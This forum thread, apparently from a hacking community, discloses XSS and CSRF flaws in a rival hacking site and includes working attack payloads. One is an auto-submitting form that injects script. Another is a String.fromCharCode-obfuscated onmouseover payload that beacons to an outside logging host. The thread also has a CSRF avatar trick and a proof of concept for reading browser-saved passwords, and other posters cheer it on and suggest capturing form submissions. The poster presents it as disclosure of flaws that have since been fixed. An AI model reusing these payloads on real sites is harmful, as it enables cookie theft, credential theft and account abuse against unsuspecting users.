[Sid]

Update: all XSS that I've listed in this thread are fixed.

I have informed sysem_meltdown, one of their admins (I'm pretty sure he's an admin), as well as Mr Cheese (their owner). The former said he knew about them and didn't care, the latter said he'd fix it but didn't, that was on the 14th.

To be honest there aren't major flaws as they tie their sessions to IPs, like we do, but it could be used for other things than just stealing cookies. I could use a JS based port scanner to try to find their ruter, then see if I could identify the router (different routers have different unique images) and maybe if I had a list of vuln routers I could change settings on them (DMZ settings for instance). Or maybe I could use AJAX to read their PMs and forward the info to me, or I could force their account to send 100s of PMs to others, whatever I wanted, almost.

Anyway... the XSS ones first, you may need an hbh account to view these btw.
In basic 8 can be demoed with the following code:

<form action="http://www.hellboundhackers.org/challenges/basic8/secure-area.php" method="post">
Username: Drake<br><br>
Password: <input type='text' name='password' value="<script>alert(document.cookie)</script>"><br>
<input type='submit' value='Login!'>
</form>
<script>document.forms[0].submit()</script>

The second is in basic 9 and uses get instead of post. For some reason I couldn't get script tags into the page (maybe hbh implements a filter to block the string "<script>". Either way, I resorted to using the onmouseover event handler on an image. Here's the code I wanted to inject:

<img onmouseover="i=document.createElement('img');i.src='http://ccl.whiteacid.org/log.php?648425Your cookies could be here';b=document.getElementsByTagName('body').item(0);b.appendChild(i)">

but since quotes are escaped I had to use javascript's String.fromCharCode() so I ended up injecting:

http://www.hellboundhackers.org/challenges/basic9/files/search.php?search=%3Cimg%20onmouseover=eval(String.fromCharCode(105,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,10
9,101,110,116,40,39,105,109,103,39,41,59,105,46,115,114,99,61,39,104,116,116,112
,
58,47,47,99,99,108,46,119,104,105,116,101,97,99,105,100,46,111,114,103,47,108,11
1
,103,46,112,104,112,63,54,52,56,52,50,53,89,111,117,114,32,99,111,111,107,105,10
1
,115,32,99,111,117,108,100,32,98,101,32,104,101,114,101,39,59,98,61,100,111,99,1
1
7,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103
,
78,97,109,101,40,39,98,111,100,121,39,41,46,105,116,101,109,40,48,41,59,98,46,97
,
112,112,101,110,100,67,104,105,108,100,40,105,41)) >&submit=Search%21

Another XSS:
http://www.hellbound...e)%3C/script%3E
That one works because $_SERVER['PHP_SELF'] can be poisoned with the script code, and when echoed executes the JS. That one works on any page where the shoutbox is visible.

Another XSS (hover over shoutbox form to use):
http://www.hellbound...=alert(1337);//

A CSRF flaw is in the profile page. I can set my avatar to for instance:
http://www.hellbound....php?logout=yes
then anyone looking at my profile gets logged out. Or I could set it to a page where I want to increase the hitcount. If I knew the admin section I could possibly even use that to elevate my privs.

[Sid]

Update: all XSS that I've listed in this thread are fixed.
Our side? I'm on their side too. I was hoping full-disclosure will make them fix the flaws quicker. I'm on their IRC just as much as on the HTS IRC and the only reason I don't use their forums is because I don't like their forum software.

[posts merged]

Here's the super XSS attack which steals their passwords in plaintext
I read a post by RSnake today which got me working on a new XSS.

If firefox (presumably other browsers too) remember your username and password, then this XSS will give you back your password (I couldn't be bothered doing the username) in an alert box. It could of course equally well send the info to me.

Obviously this only works if you have set your browser to remember your login name and password. If you want to test this to go hbh, log in with any info from bugmenot. firefox will ask you if you want to remember the info, press yes.

Then go here.
I used tinyurl cos IPB fucks with the formatting. To see the actual url go there and look at the address bar.

Hover over the shoutbox. Now your browser will freeze for a few seconds, then it'll go back to normal. Now just wait a few seconds and you should get a few alert boxes with your password it it. If not, get rid of the boxes, wait some more and again you'll get alerts, this time they should have the password in them.

It's 5:25am here, so I won't explain the code. It's really not that tricky.

Edit: I could try to tie this into one of the XSSes I found earlier which gets executed automatically, but I can't be bothered. This is a PoC, not an evil XSS.

Edit: Lockdown, I've merged the posts now.

[Lockdown]

Just because you're an uber-1337 XSS-er does not mean you have the right to double post ;)

Dude, sweet shit.

[Sid]

Sent just now to Mr_Cheese:

Quote

I recomend you do fix those flaws. I've successfully made an XSS which can detect your password in plaintext given one caveat. If you have set your browser to remember your username and password then I can use JS to read that. So... I've got a PoC here. It doesn't send me anything. Open the url, then hover your mouse over the shoutbox. Your browser will then freeze for about 5 seconds (while it's doing synchronous ajax), it'll eventually unfreeze and it'll set an internal to give you an alert every 10 seconds of your password. oh, it logs you out too, otherwise it can't get to the login form.

I recomend you close all other tabs first, just in case it crashes firefox. If you are paranoid and want to be sure it doesn't send me anything, or if you have not set firefox to save the passwords, then just log in with a non existant account and ff will ask you if you want to save the details. press yes, then run the xss.

I could have made it use another XSS hole, not the shoutbox one, but it's a PoC so I didn't want to make it too easy for people to edit for malicious purposes.

[digi7al64]

Very nice work WhiteAcid.

I also suggest that you could also create some code that was triggered when the submission form was submitted so even if the form is not pre-populated you can still catch the data on submission.

[Sid]

I'll leave that up to Mr. malicious, this is a PoC.

[rab]

;o <3, i love it. Great ideas